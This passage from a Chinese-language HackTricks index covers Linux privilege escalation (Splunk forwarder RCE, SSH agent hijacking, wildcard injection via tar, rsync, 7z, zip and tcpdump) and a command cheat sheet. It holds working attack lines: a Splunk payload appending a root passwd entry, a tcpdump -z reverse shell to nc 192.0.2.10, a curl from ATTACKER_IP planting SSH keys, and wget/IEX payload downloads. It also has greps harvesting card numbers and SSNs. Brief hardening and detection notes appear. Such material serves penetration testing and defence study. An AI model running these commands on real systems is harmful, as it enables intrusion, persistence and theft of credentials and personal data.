通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Socket Command Injection » 使用 Python 的 Socket 绑定示例","id":"1902","title":"使用 Python 的 Socket 绑定示例"},"1903":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果在 内部 或 外部 枚举一台机器时发现 Splunk正在运行 (端口8090),如果你幸运地知道任何 有效凭据 ,你可以 利用Splunk服务 以运行Splunk的用户身份 执行一个shell 。如果是root在运行它,你可以提升权限到root。 此外,如果你 已经是root并且Splunk服务不仅在localhost上监听 ,你可以 窃取 Splunk服务的 密码 文件并 破解 密码,或者 添加新的 凭据。并在主机上保持持久性。 在下面的第一张图片中,你可以看到Splunkd网页的样子。","breadcrumbs":"Linux Privilege Escalation » Splunk LPE and Persistence » Splunk LPE 和持久性","id":"1903","title":"Splunk LPE 和持久性"},"1904":{"body":"有关更多详细信息,请查看帖子 https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/ 。这只是一个总结: 漏洞概述: 针对Splunk Universal Forwarder Agent (UF) 的漏洞允许拥有代理密码的攻击者在运行该代理的系统上执行任意代码,可能会危及整个网络。 关键点: UF代理不验证传入连接或代码的真实性,使其容易受到未经授权的代码执行攻击。 常见的密码获取方法包括在网络目录、文件共享或内部文档中查找。 成功利用可能导致在受损主机上获得SYSTEM或root级别的访问权限、数据外泄和进一步的网络渗透。 漏洞执行: 攻击者获取UF代理密码。 利用Splunk API向代理发送命令或脚本。 可能的操作包括文件提取、用户账户操作和系统妥协。 影响: 在每个主机上完全网络妥协,具有SYSTEM/root级别的权限。 可能禁用日志记录以逃避检测。 安装后门或勒索软件。 利用示例命令: bash for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password \\"12345678\\" --payload \\"echo \'attacker007:x:1003:1003::/home/:/bin/bash\' >> /etc/passwd\\" --lhost 192.168.42.51;done 可用的公共漏洞: https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 https://www.exploit-db.com/exploits/46238 https://www.exploit-db.com/exploits/46487","breadcrumbs":"Linux Privilege Escalation » Splunk LPE and Persistence » Splunk Universal Forwarder Agent 
漏洞总结","id":"1904","title":"Splunk Universal Forwarder Agent 漏洞总结"},"1905":{"body":"有关更多详细信息,请查看帖子 https://blog.hrncirik.net/cve-2023-46214-analysis tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Splunk LPE and Persistence » 滥用 Splunk 查询","id":"1905","title":"滥用 Splunk 查询"},"1906":{"body":"Reading time: 2 minutes 如果您在 /etc/ssh_config 或 $HOME/.ssh/config 配置中发现以下内容,您可以做些什么: ForwardAgent yes 如果你在机器内是 root,你可能可以 访问任何由你在 /tmp 目录中找到的代理所建立的 ssh 连接 。 使用 Bob 的 ssh-agent 冒充 Bob: bash SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston","breadcrumbs":"Linux Privilege Escalation » SSH Forward Agent exploitation » 摘要","id":"1906","title":"摘要"},"1907":{"body":"当你设置变量 SSH_AUTH_SOCK 时,你正在访问 Bob 在其 ssh 连接中使用的密钥。然后,如果他的私钥仍然存在(通常是),你将能够使用它访问任何主机。 由于私钥以未加密的形式保存在代理的内存中,我想如果你是 Bob,但不知道私钥的密码,你仍然可以访问代理并使用它。 另一种选择是,代理的用户所有者和 root 可能能够访问代理的内存并提取私钥。","breadcrumbs":"Linux Privilege Escalation » SSH Forward Agent exploitation » 为什么这有效?","id":"1907","title":"为什么这有效?"},"1908":{"body":"查看 原始研究 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » SSH Forward Agent exploitation » 长篇解释和利用","id":"1908","title":"长篇解释和利用"},"1909":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 通配符(又称 glob ) 参数注入 发生在特权脚本运行 Unix 二进制文件,如 tar、chown、rsync、zip、7z 等,使用未加引号的通配符,如 *。 由于 shell 在执行二进制文件之前会扩展通配符,因此能够在工作目录中创建文件的攻击者可以构造以 - 开头的文件名,使其被解释为 选项而不是数据 ,有效地走私任意标志或甚至命令。 本页面收集了 2023-2025 年最有用的原语、最新研究和现代检测。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » Wildcards Spare Tricks","id":"1909","title":"Wildcards Spare Tricks"},"191":{"body":"DNS-SD 是一种通过查询特定域名(例如,_printers._tcp.local)在网络上发现服务的协议。响应包括所有相关域,例如可用的打印机。在 这里 可以找到服务类型的完整列表。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » DNS-SD (服务发现)","id":"191","title":"DNS-SD (服务发现)"},"1910":{"body":"您可以通过滥用 --reference 标志来 复制任意文件的所有者/组或权限位 : bash # attacker-controlled directory\\ntouch \\"--reference=/root/secret``file\\" # ← filename becomes an argument 当 root 后来执行类似的操作时: bash chown -R alice:alice *.php\\nchmod -R 644 *.php --reference=/root/secret``file 被注入,导致 所有 匹配的文件继承 /root/secret``file 的所有权/权限。 PoC & tool : wildpwn (组合攻击)。 另请参阅经典的 DefenseCode 论文以获取详细信息。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » chown / chmod","id":"1910","title":"chown / chmod"},"1911":{"body":"","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » tar","id":"1911","title":"tar"},"1912":{"body":"通过滥用 checkpoint 功能执行任意命令: bash # attacker-controlled directory\\necho \'echo pwned > /tmp/pwn\' > shell.sh\\nchmod +x shell.sh\\ntouch \\"--checkpoint=1\\"\\ntouch \\"--checkpoint-action=exec=sh shell.sh\\" 一旦 
root 运行 e.g. tar -czf /root/backup.tgz *,shell.sh 作为 root 被执行。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » GNU tar (Linux, *BSD, busybox-full)","id":"1912","title":"GNU tar (Linux, *BSD, busybox-full)"},"1913":{"body":"最近的 macOS 上默认的 tar(基于 libarchive) 不 实现 --checkpoint,但你仍然可以通过 --use-compress-program 标志实现代码执行,该标志允许你指定一个外部压缩程序。 bash # macOS example\\ntouch \\"--use-compress-program=/bin/sh\\" 当特权脚本运行 tar -cf backup.tar * 时,将启动 /bin/sh。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » bsdtar / macOS 14+","id":"1913","title":"bsdtar / macOS 14+"},"1914":{"body":"rsync 允许您通过以 -e 或 --rsync-path 开头的命令行标志覆盖远程 shell 或甚至远程二进制文件: bash # attacker-controlled directory\\ntouch \\"-e sh shell.sh\\" # -e => use instead of ssh 如果 root 后来使用 rsync -az * backup:/srv/ 归档目录,注入的标志会在远程端生成你的 shell。 PoC : wildpwn (rsync 模式)。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » rsync","id":"1914","title":"rsync"},"1915":{"body":"即使特权脚本 防御性 地用 -- 前缀添加通配符(以停止选项解析),7-Zip 格式通过用 @ 前缀文件名支持 文件列表文件 。将其与符号链接结合可以让你 外泄任意文件 : bash # directory writable by low-priv user\\ncd /path/controlled\\nln -s /etc/shadow root.txt # file we want to read\\ntouch @root.txt # tells 7z to use root.txt as file list 如果root执行类似于: bash 7za a /backup/`date +%F`.7z -t7z -snl -- * 7-Zip 将尝试将 root.txt (→ /etc/shadow) 作为文件列表读取,并将退出, 将内容打印到 stderr 。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 7-Zip / 7z / 7za","id":"1915","title":"7-Zip / 7z / 7za"},"1916":{"body":"zip 支持标志 --unzip-command,该标志在测试归档时会 逐字 传递给系统 shell: bash zip result.zip files -T --unzip-command \\"sh -c id\\" 通过精心制作的文件名注入标志,并等待特权备份脚本在生成的文件上调用 zip -T(测试归档)。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » zip","id":"1916","title":"zip"},"1917":{"body":"以下命令在现代 CTF 和真实环境中被滥用。有效载荷始终作为一个 文件名 创建在一个可写目录中,稍后将通过通配符处理: 二进制文件 滥用的标志 效果 bsdtar --newer-mtime=@ → 任意 @file 读取文件内容 flock -c 执行命令 git -c core.sshCommand= 通过 SSH 执行 git 命令 scp -S 生成任意程序而不是 ssh 这些原语不如 
tar/rsync/zip 经典常见,但在狩猎时值得检查。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 额外的易受通配符注入影响的二进制文件(2023-2025 快速列表)","id":"1917","title":"额外的易受通配符注入影响的二进制文件(2023-2025 快速列表)"},"1918":{"body":"当受限的 shell 或供应商包装器通过连接用户控制的字段(例如,“文件名”参数)构建 tcpdump 命令行时,如果没有严格的引用/验证,您可以偷偷注入额外的 tcpdump 标志。-G(基于时间的轮换)、-W(限制文件数量)和 -z (后轮换命令)的组合会导致以运行 tcpdump 的用户身份(通常是设备上的 root)执行任意命令。 前提条件: 您可以影响传递给 tcpdump 的 argv(例如,通过像 /debug/tcpdump --filter=... --file-name= 的包装器)。 包装器不清理文件名字段中的空格或以 - 开头的标记。 经典 PoC(从可写路径执行反向 shell 脚本): sh # Reverse shell payload saved on the device (e.g., USB, tmpfs)\\ncat > /mnt/disk1_1/rce.sh <<\'EOF\'\\n#!/bin/sh\\nrm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f\\nEOF\\nchmod +x /mnt/disk1_1/rce.sh # Inject additional tcpdump flags via the unsafe \\"file name\\" field\\n/debug/tcpdump --filter=\\"udp port 1234\\" \\\\\\n--file-name=\\"test -i any -W 1 -G 1 -z /mnt/disk1_1/rce.sh\\" # On the attacker host\\nnc -6 -lvnp 4444 &\\n# Then send any packet that matches the BPF to force a rotation\\nprintf x | nc -u -6 [victim_ipv6] 1234 细节: -G 1 -W 1 强制在第一个匹配的数据包后立即旋转。 -z 在每次旋转后运行后旋转命令。许多构建执行 。如果 是脚本/解释器,请确保参数处理与您的有效负载匹配。 不可移动媒体变体: 如果您有其他原始方法来写入文件(例如,允许输出重定向的单独命令包装器),将您的脚本放入已知路径并触发 -z /bin/sh /path/script.sh 或 -z /path/script.sh,具体取决于平台语义。 一些供应商包装器旋转到攻击者可控的位置。如果您可以影响旋转路径(符号链接/目录遍历),您可以引导 -z 执行您完全控制的内容,而无需外部媒体。 供应商的加固建议: 切勿直接将用户控制的字符串传递给 tcpdump(或任何工具),而不使用严格的允许列表。引用并验证。 不要在包装器中暴露 -z 功能;使用固定的安全模板运行 tcpdump,并完全禁止额外标志。 降低 tcpdump 权限(仅限 cap_net_admin/cap_net_raw)或在具有 AppArmor/SELinux 限制的专用非特权用户下运行。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » tcpdump 轮换钩子 (-G/-W/-z):通过 argv 注入在包装器中实现 RCE","id":"1918","title":"tcpdump 轮换钩子 (-G/-W/-z):通过 argv 注入在包装器中实现 RCE"},"1919":{"body":"在关键脚本中禁用 shell 通配符 :set -f (set -o noglob) 防止通配符扩展。 引用或转义 参数:tar -czf \\"$dst\\" -- * 是 不安全的 — 更倾向于使用 find . 
-type f -print0 | xargs -0 tar -czf \\"$dst\\"。 显式路径 :使用 /var/www/html/*.log 而不是 *,以便攻击者无法创建以 - 开头的兄弟文件。 最小权限 :尽可能以非特权服务帐户而不是 root 运行备份/维护作业。 监控 :Elastic 的预构建规则 通过通配符注入的潜在 Shell 查找 tar --checkpoint=*、rsync -e* 或 zip --unzip-command 后面紧跟着一个 shell 子进程。EQL 查询可以适应其他 EDR。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 检测与加固","id":"1919","title":"检测与加固"},"192":{"body":"SSDP 促进网络服务的发现,主要由 UPnP 使用。它是一种基于文本的协议,使用 UDP 通过端口 1900 进行多播寻址。对于 IPv4,指定的多播地址是 239.255.255.250。SSDP 的基础是 HTTPU ,这是 HTTP 的一个 UDP 扩展。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » SSDP (简单服务发现协议)","id":"192","title":"SSDP (简单服务发现协议)"},"1920":{"body":"Elastic Security – 检测到的通过通配符注入的潜在 Shell 规则(最后更新于 2025 年) Rutger Flohil – “macOS — Tar 通配符注入”(2024 年 12 月 18 日) GTFOBins – tcpdump FiberGateway GR241AG – 完整利用链 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 参考文献","id":"1920","title":"参考文献"},"1921":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Useful Linux Commands » 有用的 Linux 命令","id":"1921","title":"有用的 Linux 命令"},"1922":{"body":"bash #Exfiltration using Base64\\nbase64 -w 0 file #Get HexDump without new lines\\nxxd -p boot12.bin | tr -d \'\\\\n\' #Add public key to authorized keys\\ncurl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys #Echo without new line and Hex\\necho -n -e #Count\\nwc -l #Lines\\nwc -c #Chars #Sort\\nsort -nr #Sort by number and then reverse\\ncat file | sort | uniq #Sort and delete duplicates #Replace in file\\nsed -i \'s/OLD/NEW/g\' path/file #Replace string inside a file #Download in RAM\\nwget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py\\nwget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm\\ncurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py #Files used by network processes\\nlsof #Open files belonging to any process\\nlsof -p 3 #Open files used by the process\\nlsof -i #Files used by networks processes\\nlsof -i 4 #Files used by network IPv4 processes\\nlsof -i 6 #Files used by network IPv6 processes\\nlsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234\\nlsof +D /lib #Processes using files inside the indicated dir\\nlsof -i :80 #Files uses by networks processes\\nfuser -nv tcp 80 #Decompress\\ntar -xvzf /path/to/yourfile.tgz\\ntar -xvjf /path/to/yourfile.tbz\\nbzip2 -d /path/to/yourfile.bz2\\ntar jxf file.tar.bz2\\ngunzip /path/to/yourfile.gz\\nunzip file.zip\\n7z -x file.7z\\nsudo apt-get install xz-utils; unxz file.xz #Add new user\\nuseradd -p \'openssl passwd -1 \' hacker #Clipboard\\nxclip -sel c < cat file.txt #HTTP servers\\npython -m SimpleHTTPServer 80\\npython3 -m http.server\\nruby -rwebrick -e \\"WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start\\"\\nphp -S $ip:80 #Curl\\n#json data\\ncurl --header \\"Content-Type: application/json\\" --request POST --data \'{\\"password\\":\\"password\\", 
\\"username\\":\\"admin\\"}\' http://host:3000/endpoint\\n#Auth via JWT\\ncurl -X GET -H \'Authorization: Bearer \' http://host:3000/endpoint #Send Email\\nsendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content #DD copy hex bin file without first X (28) bytes\\ndd if=file.bin bs=28 skip=1 of=blob #Mount .vhd files (virtual hard drive)\\nsudo apt-get install libguestfs-tools\\nguestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd # ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys\\nssh-keyscan 10.10.10.101 # Openssl\\nopenssl s_client -connect 10.10.10.127:443 #Get the certificate from a server\\nopenssl x509 -in ca.cert.pem -text #Read certificate\\nopenssl genrsa -out newuser.key 2048 #Create new RSA2048 key\\nopenssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the \\"Organizatoin Name\\"(Fortune) and the \\"Common Name\\" (newuser@fortune.htb)\\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate\\nopenssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate\\nopenssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)\\n# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:\\nopenssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12\\n# Decrypt ssh key\\nopenssl rsa -in key.ssh.enc -out key.ssh\\n#Decrypt\\nopenssl enc -aes256 -k -d -in backup.tgz.enc -out b.tgz #Count number of instructions executed by a program, need a host based linux (not working in VM)\\nperf stat -x, -e instructions:u \\"ls\\" #Find trick for HTB, find files from 2018-12-12 to 
2018-12-14\\nfind / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path \\"/proc/*\\" -not -path \\"/sys/*\\" -ls 2>/dev/null #Reconfigure timezone\\nsudo dpkg-reconfigure tzdata #Search from which package is a binary\\napt-file search /usr/bin/file #Needed: apt-get install apt-file #Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html\\necho \\"CIKUmMesGw==\\" | base64 -d | protoc --decode_raw #Set not removable bit\\nsudo chattr +i file.txt\\nsudo chattr -i file.txt #Remove the bit so you can delete it # List files inside zip\\n7z l file.zip","breadcrumbs":"Useful Linux Commands » 常见的 Bash","id":"1922","title":"常见的 Bash"},"1923":{"body":"bash #Base64 for Windows\\necho -n \\"IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.9:8000/9002.ps1\')\\" | iconv --to-code UTF-16LE | base64 -w0 #Exe compression\\nupx -9 nc.exe #Exe2bat\\nwine exe2bat.exe nc.exe nc.txt #Compile Windows python exploit to exe\\npip install pyinstaller\\nwget -O exploit.py http://www.exploit-db.com/download/31853\\npython pyinstaller.py --onefile exploit.py #Compile for windows\\n#sudo apt-get install gcc-mingw-w64-i686\\ni686-mingw32msvc-gcc -o executable useradd.c","breadcrumbs":"Useful Linux Commands » Windows上的Bash","id":"1923","title":"Windows上的Bash"},"1924":{"body":"bash #Extract emails from file\\ngrep -E -o \\"\\\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\\\.[A-Za-z]{2,6}\\\\b\\" file.txt #Extract valid IP addresses\\ngrep -E -o \\"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\" file.txt #Extract passwords\\ngrep -i \\"pwd\\\\|passw\\" file.txt #Extract users\\ngrep -i \\"user\\\\|invalid\\\\|authentication\\\\|login\\" file.txt # Extract hashes\\n#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})\\negrep -oE \'(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)\' *.txt | egrep -o 
\'[a-fA-F0-9]{32}\' > md5-hashes.txt\\n#Extract valid MySQL-Old hashes\\ngrep -e \\"[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}\\" *.txt > mysql-old-hashes.txt\\n#Extract blowfish hashes\\ngrep -e \\"$2a\\\\$\\\\08\\\\$(.){75}\\" *.txt > blowfish-hashes.txt\\n#Extract Joomla hashes\\negrep -o \\"([0-9a-zA-Z]{32}):(w{16,32})\\" *.txt > joomla.txt\\n#Extract VBulletin hashes\\negrep -o \\"([0-9a-zA-Z]{32}):(S{3,32})\\" *.txt > vbulletin.txt\\n#Extraxt phpBB3-MD5\\negrep -o \'$H$S{31}\' *.txt > phpBB3-md5.txt\\n#Extract Wordpress-MD5\\negrep -o \'$P$S{31}\' *.txt > wordpress-md5.txt\\n#Extract Drupal 7\\negrep -o \'$S$S{52}\' *.txt > drupal-7.txt\\n#Extract old Unix-md5\\negrep -o \'$1$w{8}S{22}\' *.txt > md5-unix-old.txt\\n#Extract md5-apr1\\negrep -o \'$apr1$w{8}S{22}\' *.txt > md5-apr1.txt\\n#Extract sha512crypt, SHA512(Unix)\\negrep -o \'$6$w{8}S{86}\' *.txt > sha512crypt.txt #Extract e-mails from text files\\ngrep -E -o \\"\\\\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\\\\b\\" *.txt > e-mails.txt #Extract HTTP URLs from text files\\ngrep http | grep -shoP \'http.*?[\\" >]\' *.txt > http-urls.txt\\n#For extracting HTTPS, FTP and other URL format use\\ngrep -E \'(((https|ftp|gopher)|mailto)[.:][^ >\\"\\t]*|www.[-a-z0-9.]+)[^ .,;\\t>\\">):]\' *.txt > urls.txt\\n#Note: if grep returns \\"Binary file (standard input) matches\\" use the following approaches # tr \'[\\\\000-\\\\011\\\\013-\\\\037177-377]\' \'.\' < *.log | grep -E \\"Your_Regex\\" OR # cat -v *.log | egrep -o \\"Your_Regex\\" #Extract Floating point numbers\\ngrep -E -o \\"^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$\\" *.txt > floats.txt # Extract credit card data\\n#Visa\\ngrep -E -o \\"4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}\\" *.txt > visa.txt\\n#MasterCard\\ngrep -E -o \\"5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}\\" *.txt > mastercard.txt\\n#American Express\\ngrep -E -o \\"\\\\b3[47][0-9]{13}\\\\b\\" *.txt > american-express.txt\\n#Diners Club\\ngrep -E -o 
\\"\\\\b3(?:0[0-5]|[68][0-9])[0-9]{11}\\\\b\\" *.txt > diners.txt\\n#Discover\\ngrep -E -o \\"6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}\\" *.txt > discover.txt\\n#JCB\\ngrep -E -o \\"\\\\b(?:2131|1800|35d{3})d{11}\\\\b\\" *.txt > jcb.txt\\n#AMEX\\ngrep -E -o \\"3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}\\" *.txt > amex.txt # Extract IDs\\n#Extract Social Security Number (SSN)\\ngrep -E -o \\"[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}\\" *.txt > ssn.txt\\n#Extract Indiana Driver License Number\\ngrep -E -o \\"[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}\\" *.txt > indiana-dln.txt\\n#Extract US Passport Cards\\ngrep -E -o \\"C0[0-9]{7}\\" *.txt > us-pass-card.txt\\n#Extract US Passport Number\\ngrep -E -o \\"[23][0-9]{8}\\" *.txt > us-pass-num.txt\\n#Extract US Phone Numberss\\ngrep -Po \'d{3}[s-_]?d{3}[s-_]?d{4}\' *.txt > us-phones.txt\\n#Extract ISBN Numbers\\negrep -a -o \\"\\\\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\\\\b\\" *.txt > isbn.txt","breadcrumbs":"Useful Linux Commands » Greps","id":"1924","title":"Greps"},"1925":{"body":"bash # Find SUID set files.\\nfind / -perm /u=s -ls 2>/dev/null # Find SGID set files.\\nfind / -perm /g=s -ls 2>/dev/null # Found Readable directory and sort by time. (depth = 4)\\nfind / -type d -maxdepth 4 -readable -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Found Writable directory and sort by time. (depth = 10)\\nfind / -type d -maxdepth 10 -writable -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Or Found Own by Current User and sort by time. 
(depth = 10)\\nfind / -maxdepth 10 -user $(id -u) -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Or Found Own by Current Group ID and Sort by time. (depth = 10)\\nfind / -maxdepth 10 -group $(id -g) -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Found Newer files and sort by time. (depth = 5)\\nfind / -maxdepth 5 -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r | less # Found Newer files only and sort by time. (depth = 5)\\nfind / -maxdepth 5 -type f -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r | less # Found Newer directory only and sort by time. 
(depth = 5)\\nfind / -maxdepth 5 -type d -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r | less","breadcrumbs":"Useful Linux Commands » 查找","id":"1925","title":"查找"},"1926":{"body":"bash #Nmap scripts ((default or version) and smb))\\nnmap --script-help \\"(default or version) and *smb*\\"\\nlocate -r \'\\\\.nse$\' | xargs grep categories | grep \'default\\\\|version\\\\|safe\' | grep smb\\nnmap --script-help \\"(default or version) and smb)\\"","breadcrumbs":"Useful Linux Commands » Nmap 搜索帮助","id":"1926","title":"Nmap 搜索帮助"},"1927":{"body":"bash #All bytes inside a file (except 0x20 and 0x00)\\nfor j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v \\"20\\\\|00\\"); do echo -n -e \\"\\\\x$j\\" >> bytes; done","breadcrumbs":"Useful Linux Commands » Bash","id":"1927","title":"Bash"},"1928":{"body":"bash #Delete curent rules and chains\\niptables --flush\\niptables --delete-chain #allow loopback\\niptables -A INPUT -i lo -j ACCEPT\\niptables -A OUTPUT -o lo -j ACCEPT #drop ICMP\\niptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP\\niptables -A OUTPUT -p icmp -j DROP #allow established connections\\niptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #allow ssh, http, https, dns\\niptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT\\niptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT\\niptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT\\niptables -A INPUT -p udp -m udp 